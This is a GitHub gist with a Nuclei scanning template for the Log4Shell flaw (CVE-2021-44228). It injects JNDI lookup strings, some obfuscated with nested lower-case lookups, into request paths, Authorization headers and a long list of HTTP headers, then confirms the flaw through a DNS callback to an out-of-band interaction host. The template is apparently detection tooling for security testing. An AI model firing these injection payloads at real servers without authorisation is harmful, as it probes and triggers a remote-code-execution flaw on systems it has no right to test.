Last active
December 18, 2023 06:50
-
-
Save hazcod/f6b2d3f8a3bc3eb95a137bcd6d144a38 to your computer and use it in GitHub Desktop.
Nuclei template to scan for log4shell (CVE-2021-44228).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2021-44228 | |
| info: | |
| name: Log4J RCE | |
| author: iNvist / hazcod | |
| severity: critical | |
| description: CVE-2021-44228 | |
| requests: | |
| - raw: | |
| - | | |
| GET /{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1 | |
| Host: {{Hostname}} | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET //{{Path}}${jndi:dns://{{interactsh-url}}:80/d HTTP/1.1 | |
| Host: {{Hostname}} | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET /{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1 | |
| Host: {{Hostname}} | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET //{{Path}}${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/d HTTP/1.1 | |
| Host: {{Hostname}} | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| # TODO maybe encoding | |
| - raw: | |
| - | | |
| GET /{{Path}}?${${lower:jn}di:${lower:dn}s:://{{interactsh-url}}:80/d HTTP/1.1 | |
| Host: {{Hostname}} | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET /{{Path}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o | |
| payloads: | |
| auth_type: | |
| - Bearer | |
| - Oauth | |
| - Token | |
| - Basic | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET //{{Path}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| Authorization: {{auth_type }} ${jndi:dns://{{interactsh-url}}:80/o | |
| payloads: | |
| auth_type: | |
| - Bearer | |
| - Oauth | |
| - Token | |
| - Basic | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET /{{Path}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| Authorization: {{auth_type }} ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o | |
| payloads: | |
| auth_type: | |
| - Bearer | |
| - Oauth | |
| - Token | |
| - Basic | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - type: regex | |
| part: interactsh_request | |
| regex: | |
| - "JRMP" | |
| - raw: | |
| - | | |
| GET /{{Path}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| §header_val§: ${${lower:jn}di:${lower:dn}s://{{interactsh-url}}:80/o | |
| payloads: | |
| header_val: | |
| - Accept | |
| - Accept-Charset | |
| - Accept-Datetime | |
| - Accept-Encoding | |
| - Accept-Language | |
| - Alt-Svc | |
| - Base-Url | |
| - CF-Connecting-IP | |
| - Cache-Control | |
| - Client-IP | |
| - Cluster | |
| - Cluster-Client-IP | |
| - Connection | |
| - Contact | |
| - Content-Length | |
| - Content-MD5 | |
| - Content-Type | |
| - Cookie | |
| - DNT | |
| - Date | |
| - Destination | |
| - Expect | |
| - Forwarded | |
| - From | |
| - Front-End-Https | |
| - HTTP_CLIENT_IP | |
| - HTTP_FORWARDED | |
| - HTTP_FORWARDED_FOR | |
| - HTTP_X_FORWARDED | |
| - HTTP_X_FORWARDED_FOR | |
| - Host | |
| - Http-Url | |
| - If-Match | |
| - If-Modified-Since | |
| - If-None-Match | |
| - If-Range | |
| - If-Unmodified-Since | |
| - Link | |
| - Location | |
| - Max-Forwards | |
| - Origin | |
| - Pragma | |
| - Profile | |
| - Proxy | |
| - Proxy-Authorization | |
| - Proxy-Connection | |
| - Proxy-Host | |
| - Proxy-Url | |
| - Range | |
| - Real-IP | |
| - Redirect | |
| - Referer | |
| - Referrer | |
| - Refferer | |
| - Request-Uri | |
| - TE | |
| - True-Client-IP | |
| - UID | |
| - Upgrade | |
| - Uri | |
| - User-Agent | |
| - Via | |
| - Warning | |
| - X-ATT-DeviceId | |
| - X-Arbitrary | |
| - X-CSRFToken | |
| - X-Client-IP | |
| - X-Cluster-Client-IP | |
| - X-Correlation-ID | |
| - X-Csrf-Token | |
| - X-Do-Not-Track | |
| - X-Forward-For | |
| - X-Forwarded | |
| - X-Forwarded-By | |
| - X-Forwarded-For | |
| - X-Forwarded-For-IP | |
| - X-Forwarded-For-Original | |
| - X-Forwarded-Host | |
| - X-Forwarded-Proto | |
| - X-Forwarded-Server | |
| - X-Forwarder-For | |
| - X-Host | |
| - X-Http-Destinationurl | |
| - X-Http-Host-Override | |
| - X-Http-Method-Override | |
| - X-Original-Remote-Addr | |
| - X-Original-Url | |
| - X-Originating-IP | |
| - X-Proxy-Url | |
| - X-ProxyUser-IP | |
| - X-Real-IP | |
| - X-Remote-Addr | |
| - X-Remote-IP | |
| - X-Request-ID | |
| - X-Requested-With | |
| - X-Rewrite-Url | |
| - X-True-IP | |
| - X-UIDH | |
| - X-Wap-Profile | |
| - X-XSRF-TOKEN | |
| attack: clusterbomb | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" | |
| - raw: | |
| - | | |
| GET /{{Path}} HTTP/1.1 | |
| Host: {{Hostname}} | |
| §header_val§: ${jndi:dns://{{interactsh-url}}:80/o | |
| payloads: | |
| header_val: | |
| - Accept | |
| - Accept-Charset | |
| - Accept-Datetime | |
| - Accept-Encoding | |
| - Accept-Language | |
| - Alt-Svc | |
| - Base-Url | |
| - CF-Connecting-IP | |
| - Cache-Control | |
| - Client-IP | |
| - Cluster | |
| - Cluster-Client-IP | |
| - Connection | |
| - Contact | |
| - Content-Length | |
| - Content-MD5 | |
| - Content-Type | |
| - Cookie | |
| - DNT | |
| - Date | |
| - Destination | |
| - Expect | |
| - Forwarded | |
| - From | |
| - Front-End-Https | |
| - HTTP_CLIENT_IP | |
| - HTTP_FORWARDED | |
| - HTTP_FORWARDED_FOR | |
| - HTTP_X_FORWARDED | |
| - HTTP_X_FORWARDED_FOR | |
| - Host | |
| - Http-Url | |
| - If-Match | |
| - If-Modified-Since | |
| - If-None-Match | |
| - If-Range | |
| - If-Unmodified-Since | |
| - Link | |
| - Location | |
| - Max-Forwards | |
| - Origin | |
| - Pragma | |
| - Profile | |
| - Proxy | |
| - Proxy-Authorization | |
| - Proxy-Connection | |
| - Proxy-Host | |
| - Proxy-Url | |
| - Range | |
| - Real-IP | |
| - Redirect | |
| - Referer | |
| - Referrer | |
| - Refferer | |
| - Request-Uri | |
| - TE | |
| - True-Client-IP | |
| - UID | |
| - Upgrade | |
| - Uri | |
| - User-Agent | |
| - Via | |
| - Warning | |
| - X-ATT-DeviceId | |
| - X-Arbitrary | |
| - X-CSRFToken | |
| - X-Client-IP | |
| - X-Cluster-Client-IP | |
| - X-Correlation-ID | |
| - X-Csrf-Token | |
| - X-Do-Not-Track | |
| - X-Forward-For | |
| - X-Forwarded | |
| - X-Forwarded-By | |
| - X-Forwarded-For | |
| - X-Forwarded-For-IP | |
| - X-Forwarded-For-Original | |
| - X-Forwarded-Host | |
| - X-Forwarded-Proto | |
| - X-Forwarded-Server | |
| - X-Forwarder-For | |
| - X-Host | |
| - X-Http-Destinationurl | |
| - X-Http-Host-Override | |
| - X-Http-Method-Override | |
| - X-Original-Remote-Addr | |
| - X-Original-Url | |
| - X-Originating-IP | |
| - X-Proxy-Url | |
| - X-ProxyUser-IP | |
| - X-Real-IP | |
| - X-Remote-Addr | |
| - X-Remote-IP | |
| - X-Request-ID | |
| - X-Requested-With | |
| - X-Rewrite-Url | |
| - X-True-IP | |
| - X-UIDH | |
| - X-Wap-Profile | |
| - X-XSRF-TOKEN | |
| attack: clusterbomb | |
| matchers-condition: or | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment